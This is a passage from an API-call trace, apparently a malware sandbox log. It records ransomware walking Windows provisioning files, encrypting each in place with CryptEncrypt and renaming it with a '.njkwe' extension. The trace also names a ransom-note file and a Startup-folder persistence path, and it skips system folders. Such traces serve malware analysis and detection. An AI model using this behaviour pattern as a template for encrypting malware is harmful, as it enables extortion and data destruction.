(Taiwan)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.538] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml") returned 165 [0079.538] StrStrIW (lpFirst="440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.538] lstrcmpW (lpString1="440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.538] lstrcmpW (lpString1="440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.538] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\440__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.538] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\440__connections_cellular_vibo telecom (taiwan)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.538] GetTickCount () returned 0x115433f [0079.538] GetTickCount () returned 0x115433f [0079.538] GetTickCount () returned 0x115433f [0079.538] GetTickCount () returned 0x115433f [0079.538] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.539] GetProcessHeap () returned 0xbe0000 [0079.539] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.539] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2bf, lpOverlapped=0x0) returned 1 [0079.544] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd41, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.544] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2bf, lpOverlapped=0x0) returned 1 [0079.544] GetProcessHeap () returned 0xbe0000 [0079.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.544] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.544] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.544] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.544] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.545] CloseHandle (hObject=0x43c) returned 1 [0079.545] GetProcessHeap () returned 0xbe0000 [0079.545] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.545] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0079.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\440__connections_cellular_vibo telecom (taiwan)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\440__Connections_Cellular_VIBO Telecom (Taiwan)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\440__connections_cellular_vibo telecom (taiwan)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.545] GetProcessHeap () returned 0xbe0000 [0079.545] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.545] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ffddb3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ffddb3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ffddb3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="441__C~1.PRO")) returned 1 [0079.545] lstrcmpiW (lpString1="441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0079.545] lstrcmpiW (lpString1="441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0079.545] lstrcmpiW (lpString1="441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0079.545] lstrcmpiW (lpString1="441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0079.546] lstrcmpiW (lpString1="441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0079.546] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0079.546] StrStrIW (lpFirst="441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0079.546] lstrcmpW (lpString1="441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.546] lstrcmpW (lpString1="441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0079.546] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\441__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.546] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\441__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.546] GetTickCount () returned 0x115434f [0079.546] GetTickCount () returned 0x115434f [0079.546] GetTickCount () returned 0x115434f [0079.546] GetTickCount () returned 0x115434f [0079.546] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.546] GetProcessHeap () returned 0xbe0000 [0079.546] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.546] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1cc, lpOverlapped=0x0) returned 1 [0079.547] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.547] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1cc, lpOverlapped=0x0) returned 1 [0079.547] GetProcessHeap () returned 0xbe0000 [0079.547] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.547] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.547] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.550] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.551] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.551] CloseHandle (hObject=0x43c) returned 1 [0079.551] GetProcessHeap () returned 0xbe0000 [0079.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.551] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\441__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\441__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\441__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.551] GetProcessHeap () returned 0xbe0000 [0079.551] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.551] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ffddb3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ffddb3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ffddb3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml", cAlternateFileName="442__C~1.PRO")) returned 1 [0079.552] lstrcmpiW (lpString1="442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.552] lstrcmpiW (lpString1="442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.552] lstrcmpiW (lpString1="442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.552] lstrcmpiW (lpString1="442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.552] lstrcmpiW (lpString1="442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.552] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml") returned 171 [0079.552] StrStrIW (lpFirst="442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.552] lstrcmpW (lpString1="442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.552] lstrcmpW (lpString1="442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.552] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\442__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.552] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\442__connections_cellular_vodacom tanzania (tanzania)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.552] GetTickCount () returned 0x115434f [0079.552] GetTickCount () returned 0x115434f [0079.552] GetTickCount () returned 0x115434f [0079.552] GetTickCount () returned 0x115434f [0079.552] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.552] GetProcessHeap () returned 0xbe0000 [0079.552] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.552] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0079.557] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.558] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0079.558] GetProcessHeap () returned 0xbe0000 [0079.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.558] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.558] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.558] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.558] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.558] CloseHandle (hObject=0x43c) returned 1 [0079.558] GetProcessHeap () returned 0xbe0000 [0079.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.558] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 191 [0079.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\442__connections_cellular_vodacom tanzania (tanzania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\442__Connections_Cellular_Vodacom Tanzania (Tanzania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\442__connections_cellular_vodacom tanzania (tanzania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.559] GetProcessHeap () returned 0xbe0000 [0079.559] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.559] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ffddb3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ffddb3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ffddb3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="443__C~1.PRO")) returned 1 [0079.559] lstrcmpiW (lpString1="443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0079.559] lstrcmpiW (lpString1="443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0079.559] lstrcmpiW (lpString1="443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0079.559] lstrcmpiW (lpString1="443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0079.559] lstrcmpiW (lpString1="443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0079.559] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0079.559] StrStrIW (lpFirst="443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0079.559] lstrcmpW (lpString1="443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.560] lstrcmpW (lpString1="443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0079.560] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\443__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.560] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\443__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.560] GetTickCount () returned 0x115435e [0079.560] GetTickCount () returned 0x115435e [0079.560] GetTickCount () returned 0x115435e [0079.560] GetTickCount () returned 0x115435e [0079.560] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.560] GetProcessHeap () returned 0xbe0000 [0079.560] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.560] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0079.561] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.561] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0079.561] GetProcessHeap () returned 0xbe0000 [0079.561] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.561] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.561] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.566] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.566] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.566] CloseHandle (hObject=0x43c) returned 1 [0079.566] GetProcessHeap () returned 0xbe0000 [0079.566] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.566] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0079.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\443__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\443__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\443__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.567] GetProcessHeap () returned 0xbe0000 [0079.567] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.567] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: 